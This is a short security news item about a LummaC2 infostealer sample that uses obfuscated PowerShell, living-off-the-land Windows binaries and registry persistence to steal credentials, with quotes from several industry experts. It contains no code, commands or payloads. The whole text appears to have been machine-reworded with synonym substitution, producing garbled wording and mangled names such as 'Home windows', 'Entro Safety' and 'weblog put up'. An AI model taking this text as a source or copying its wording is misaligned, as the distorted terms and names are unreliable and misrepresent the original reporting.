LummaC2 infostealer makes use of obfuscated scripts by way of PowerShell to focus on endpoints – Cyber Tech

A brand new pattern of the LummaC2 infostealer was noticed utilizing a sequence of PowerShell instructions that downloaded and executed a payload on a focused endpoint.

In a latest weblog put up, researchers at Ontinue described LummaC2 as an information-stealing malware written within the C programming language that’s designed to steal delicate data.

The researchers stated the malware was noticed getting used as malware-as-a-service (MaaS), and was seen on Russian-speaking boards beginning in 2022. The malware infects the goal host and goals to steal data from the endpoint after which exfiltrate it to the C2 server.

“The important thing takeaway from our evaluation is a reinforcement of the significance of monitoring and mitigating obfuscated scripts, significantly these delivered by way of PowerShell,” stated Rhys Downing cyber defender at Ontinue. “Whereas the usage of obfuscated PowerShell instructions will not be new, it stays a extremely efficient method for attackers. Safety groups ought to prioritize enhancing their detection and response capabilities round such techniques, making certain that even well-known strategies are repeatedly scrutinized and blocked.”

Why safety execs ought to take note of LummaC2’s resurgence

LummaC2’s resurgence highlights vital dangers due to its refined use of PowerShell and “living-off-the-land” binaries already accessible inside an surroundings, making it more durable to detect and mitigate, stated Jason Soroko, senior fellow at Sectigo.

Not like typical PowerShell-based malware, Soroko stated LummaC2 combines obfuscation, trusted Home windows binaries (Mshta.exe and Dllhost.exe), and persistence strategies by way of registry modifications to evade defenses and preserve long-term management.

“The important takeaway is the malware’s superior multi-stage an infection course of and skill to use authentic system instruments, which requires heightened vigilance and proactive protection methods from safety groups,” stated Soroko. “Whereas PowerShell instructions are generally exploited, LummaC2’s mixture of techniques presents a singular and more difficult menace.”

Itzik Alvas, co-founder and CEO at Entro Safety, added that the LummaC2 infostealer lets attackers compromise credentials of human and non-human identities (NHIs) on contaminated techniques. Alvas stated whereas the preliminary scope of assault is usually comparatively benign and most industries have standardized IAM and governance controls in place to restrict dangers related to compromised human credentials, NHIs are sometimes created and used with extreme permissions.

“Because of this, compromised NHIs permit attackers on an contaminated system to covertly assault your entire group from inside,” stated Alvas.